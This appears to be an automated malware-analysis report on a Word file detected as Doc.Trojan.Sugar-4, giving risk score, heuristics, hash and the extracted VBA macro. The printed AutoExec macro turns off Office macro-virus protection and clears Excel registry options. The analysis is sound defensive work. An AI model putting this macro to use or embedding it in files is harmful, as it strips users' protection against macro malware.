MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sugar-4. It contains VBA macros that, when executed, attempt to disable macro virus protection and modify Excel settings. The AutoExec subroutine explicitly targets registry keys related to Excel options, suggesting an intent to prepare the system for subsequent malicious actions or to evade detection.
Heuristics 2
-
ClamAV: Doc.Trojan.Sugar-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sugar-4
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 632 bytes |
SHA-256: 37c7478d3f552eafe278b11d9624d70011ff7d7f8c020396ea99b9b8866bcbf4 |
|||
|
Detection
ClamAV:
Doc.Trojan.Sugar-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec() 'Vic
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.